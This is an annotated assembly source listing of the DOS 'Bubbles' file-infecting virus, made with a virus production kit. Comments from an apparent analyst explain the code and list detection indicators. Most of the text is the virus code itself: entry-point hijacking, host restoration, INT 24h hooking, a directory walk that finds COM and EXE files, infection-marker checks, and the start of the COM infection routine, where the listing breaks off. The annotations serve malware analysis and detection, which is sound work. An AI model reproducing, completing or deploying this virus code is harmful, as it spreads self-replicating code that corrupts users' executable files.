📄 bubbles1.asm
;---------
; Bubbles Virus written by Admiral Bailey
; Using The Instant Virus Production Kit By Admiral Bailey
; To compile this use TASM /M BUBBLES.ASM
;---------
; Analyst note: segment setup and entry stub for a DOS .COM image (TASM syntax).
; ID is the two-character marker this listing compares against SP (cmp sp,id)
; and against the word at offset 10h of a file's first bytes (CheckExe) to
; recognise EXE files that have already been modified.
code segment public 'code'
assume cs:code
org 100h ; All .COM files start here
ID = 'AB' ; Id for infected files
start:
; E9 00 00 encodes a near jump with a zero displacement, so execution simply
; continues at the next label.
db 0e9h,0,0 ; Jump to the next command
; Analyst note: entry of the appended body. The call/pop pair reads the
; run-time address of realcode; subtracting its assembled offset leaves a
; delta in BP, which every later [bp+offset label] reference relies on.
; BP must therefore stay intact for the rest of the run.
virus:
call realcode ; Push current location on stack
realcode:
; The NOP runs here and below have no functional effect; their purpose is not
; evident from this listing.
nop
nop
nop
nop
nop
pop bp ; Get location off stack
sub bp,offset realcode ; BP = run-time address minus assembled address
nop
nop
nop
nop
; encrypt_decrypt is defined outside this excerpt.
call encrypt_decrypt ; Decrypt the virus first
; Analyst note: host-restore dispatch and the COM restore path.
; Per the author's marker, everything from encrypt_start onward is the region
; handled by encrypt_decrypt (routine not visible in this excerpt).
; SP equal to ID at entry selects the EXE path. Offset 10h of an MZ header is
; the initial-SP field, and CheckExe tests that same field for ID.
encrypt_start equ $ ; From here is encrypted
cmp sp,id ; COM or EXE?
je restoreEXE
; COM path: copy the three saved bytes at oldjump back to 100h.
; Uses whatever DS/ES are at entry - presumably equal to CS for a .COM; verify.
lea si,[bp+offset oldjump] ; Location of old jump in si
mov di,100h ; Location of where to put it in di
push di ; 100h stays on the stack; the later retn returns to it
movsb ; Move a byte
movsw ; Move a word (three bytes restored in total)
jmp exitrestore
; Analyst note: EXE restore path. Saves the host's DS/ES on the stack (popped
; again in ReturnEXE), points DS and ES at CS, then copies four words
; (8 bytes) from jmpsave2 to jmpsave. Because jmpsave, stacksave, jmpsave2 and
; stacksave2 are declared as consecutive dwords, this fills both jmpsave and
; stacksave from their "2" copies.
restoreEXE:
push ds ; Save ExE ds
push es ; Save ExE es
push cs
pop ds ; DS now equals CS
push cs
pop es ; ES now equals CS
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
movsw ; Move a word
; Analyst note: environment setup before the file search.
;  - moves the DTA to a private buffer (set_DTA is defined outside this excerpt)
;  - saves the INT 24h (DOS critical-error) vector and installs its own
;    handler at int24; the handler body is not visible here
;  - records the current directory so it can be restored afterwards
ExitRestore:
lea dx,[bp+offset dta] ; Where to put New DTA
call set_DTA ; Move it
mov ax,3524h ; Get int 24 handler
int 21h ; To ES:BX
mov word ptr [bp+oldint24],bx ; Save it
mov word ptr [bp+oldint24+2],es
; Only AH is reloaded below; the call relies on AL still holding 24h from the
; AX load above - TODO confirm.
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
mov ah,47h ; Get the current directory
mov dl,0h ; On current drive
lea si,[bp+offset currentdir] ; Where to keep it
int 21h
; Analyst note: main search loop and clean-up.
; Each pass runs findfirst with two file specs (exefilespec and comfilespec,
; defined outside this excerpt), then changes to the path stored at
; 'directory' (the author's comment says '..'). The loop repeats until the
; change-directory call fails with carry set. Observable behaviour for
; detection: a walk from the starting directory towards the root, touching
; matching files in each directory, followed by a console message.
dirloop:
lea dx,[bp+offset exefilespec]
call findfirst
lea dx,[bp+offset comfilespec]
call findfirst
lea dx,[bp+offset directory] ; Where to change too '..'
mov ah,3bh ; Change directory
int 21h
jnc dirloop ; If no problems the look for files
; INT 21h/AH=09h prints a '$'-terminated string; virusname is defined outside
; this excerpt.
mov ah,9 ; Display string
lea dx,[bp+virusname]
int 21h
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; To original
int 21h
push cs
pop ds ; Do this because the DS gets changed
lea dx,[bp+offset currentdir] ; Location Of original dir
mov ah,3bh ; Change to there
int 21h
mov dx,80h ; Location of original DTA
call set_dta ; Put it back there
; The EXE path pushed DS and ES in restoreEXE, so SP is now 4 below the value
; tested at entry; hence id-4.
cmp sp,id-4 ; EXE or COM?
jz returnEXE
; COM path: pops the 100h pushed before the restore and resumes the host there.
retn ; Return to 100h to original jump
; Analyst note: hand control back to an EXE host.
; Pops the DS/ES saved in restoreEXE, computes ES+10h (presumably PSP segment
; + 10h, i.e. the start of the loaded image - verify), adds it to the segment
; word of jmpsave and to the segment word of stacksave, loads SS:SP, then
; executes a far jump. The opcode byte 0EAh is emitted as data and the dword
; at jmpsave that follows it is the jump operand, so the code patches its own
; instruction operand at run time.
ReturnEXE:
pop es ; Get original ES
pop ds ; Get original DS
mov ax,es
add ax,10h
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear int's because of stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; Jump ssss:oooo
jmpsave dd ? ; Jump location
; NOTE(review): the code above loads SP from stacksave and adds stacksave+2
; into SS, so this dword is used as the host's stack pointer, not cs:ip.
stacksave dd ? ; Original ss:sp as used above
jmpsave2 dd 0fff00000h ; Used with carrier file
stacksave2 dd ?
; Analyst note: directory enumeration helper.
; In:  DS:DX -> file spec (set by the caller in dirloop).
; Calls 'infection' once per matching directory entry and returns when the
; find call reports carry (no more matches). CX=7 is the attribute mask
; read-only + hidden + system, so files with those attributes are included.
findfirst:
mov ah,4eh ; Find first file
mov cx,7 ; Attribute mask: read-only, hidden, system
findnext:
int 21h ; Find first/next file int
jc quit ; If none found then change dir
call infection ; Infect that file
; Findnext2 is not referenced in this excerpt; presumably a re-entry point
; used by code further down the file.
Findnext2:
mov ah,4fh ; Find next file
jmp findnext ; Jump to the loop
quit:
ret
; Analyst note: per-file triage. Reads the first 1Ah bytes of the file found
; by findfirst into 'buffer', closes it, then decides whether to skip it.
; The 'open' helper is defined outside this excerpt; the read and close calls
; below presumably rely on it leaving the file handle in BX - verify.
; Skip conditions visible here (useful as detection/triage indicators):
;   EXE: the word at header offset 10h (initial-SP field) already equals ID.
;   COM: the file name has 'ND' at characters 5-6 (e.g. COMMAND.COM), or the
;        file size equals the word at file offset 1 plus (eof-virus+3).
infection:
mov ax,3d00h ; Open file for read only
call open
mov ah,3fh ; Read from file
mov cx,1ah
lea dx,[bp+offset buffer] ; Location to store them
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM' ; EXE?
jz checkEXE ; Why yes, yes it is!
; The DTA file name starts at offset 30 (1Eh), so DTA+35 is characters 5-6 of
; the name.
mov ax,word ptr [bp+DTA+35] ; Get chars 5-6 of file name in ax
cmp ax,'DN' ; Is it 'ND', as in COMMAND? (reverse order)
jz quitinfect ; Yup so get another file
CheckCom:
; DTA+1Ah is the low word of the file size. buffer+1 is treated as the
; displacement of a leading 3-byte jump; the first byte itself is not checked.
mov bx,[bp+offset dta+1ah] ; Get file size
mov cx,word ptr [bp+buffer+1] ; Get jump loc of file
add cx,eof-virus+3 ; Add for virus size
cmp bx,cx ; Does file size=file jump+virus size
jz quitinfect ; Yup then get another file
jmp infectcom
CheckExe:
cmp word ptr [bp+buffer+10h],id ; Check EXE for infection
jz quitinfect ; Already infected so close up
jmp infectexe
quitinfect:
ret
InfectCom:
sub bx,3 ; Adjust for new jump
lea si,[bp+buffer]
lea di,[bp+oldjump]
movsw